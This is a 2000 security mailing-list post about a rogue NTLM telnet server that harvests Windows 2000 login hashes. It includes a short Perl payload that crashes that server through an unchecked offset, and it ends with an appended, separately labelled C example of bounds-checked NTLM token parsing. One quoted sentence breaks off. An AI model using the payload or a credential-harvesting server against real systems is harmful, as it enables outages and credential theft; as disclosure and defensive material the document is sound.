Re: Win2k Telnet.exe malicious server vulnerability
From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400

/* NTLM telnetD v0.8

   Snarfs NTLM challenge/response by convincing w2k telnet client to
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld

   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!


And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections

Connection from:
Got NTLM response token
[1]+  Segmentation fault      ./ntlm_telnetd -l 1234

We are so batman.  And now I'm late for class.  (grr, 6.003)


#!/usr/bin/perl -w
# anti-ntlm-telnetd by jim () jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos
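The crash above comes from using an attacker-supplied offset as a pointer modifier without checking it against the token length. As an added example (not code from the post or from ntlm_telnetd.c), here is the bounds check a server-side NTLM Type 3 parser needs; the post does not show the daemon's struct, so the field positions follow the public NTLMSSP Type 3 layout, and treating rp->upos as the user-name buffer's offset is an assumption.

```c
/* Bounds-checked extraction of the user-name "security buffer" from an
 * untrusted NTLMSSP Type 3 token. Field positions follow the public Type 3
 * layout (assumption: rp->upos in the post is this buffer's offset). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TYPE3_USER_SECBUF 36  /* len(2) maxlen(2) offset(4) of the user name */
/* Emit a little-endian security buffer with maxlen == len. */
#define SECBUF(len, off) (len) & 0xff, (len) >> 8, (len) & 0xff, (len) >> 8, \
    (off) & 0xff, ((off) >> 8) & 0xff, ((off) >> 16) & 0xff, ((off) >> 24) & 0xff

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) {
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Returns 1 and fills *upos/*ulen (either may be NULL) only if the user-name
 * buffer lies entirely inside tok[0..toklen); every offset is validated
 * before it is added to the base pointer, the check the rogue daemon lacks. */
int ntlm3_user(const uint8_t *tok, size_t toklen, size_t *upos, uint16_t *ulen)
{
    if (toklen < TYPE3_USER_SECBUF + 8) return 0;   /* header truncated */
    if (memcmp(tok, "NTLMSSP", 8) != 0) return 0;   /* signature incl. NUL */
    if (rd32(tok + 8) != 3) return 0;               /* not a Type 3 message */
    uint16_t len = rd16(tok + TYPE3_USER_SECBUF);
    uint32_t off = rd32(tok + TYPE3_USER_SECBUF + 4);
    /* Compare the offset first so `toklen - off` cannot underflow. */
    if (off > toklen || len > toklen - off) return 0;
    if (upos) *upos = off;
    if (ulen) *ulen = len;
    return 1;
}

/* Constructed tokens: a well-formed one, and one carrying the post's
 * 0xDEADBEEF offset in the user-name buffer. LM, NT and domain are empty. */
static const uint8_t kGoodTok[] = { 'N','T','L','M','S','S','P',0, 3,0,0,0,
    SECBUF(0,44), SECBUF(0,44), SECBUF(0,44), SECBUF(3,44), 'j','i','m' };
static const uint8_t kBadTok[]  = { 'N','T','L','M','S','S','P',0, 3,0,0,0,
    SECBUF(0,44), SECBUF(0,44), SECBUF(0,44), SECBUF(3,0xDEADBEEF), 'j','i','m' };

int main(void)
{
    size_t pos; uint16_t len;
    if (ntlm3_user(kGoodTok, sizeof kGoodTok, &pos, &len))
        printf("user: %.*s\n", (int)len, kGoodTok + pos);   /* user: jim */
    printf("bad token accepted: %d\n", ntlm3_user(kBadTok, sizeof kBadTok, NULL, NULL));
    return 0;
}
```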

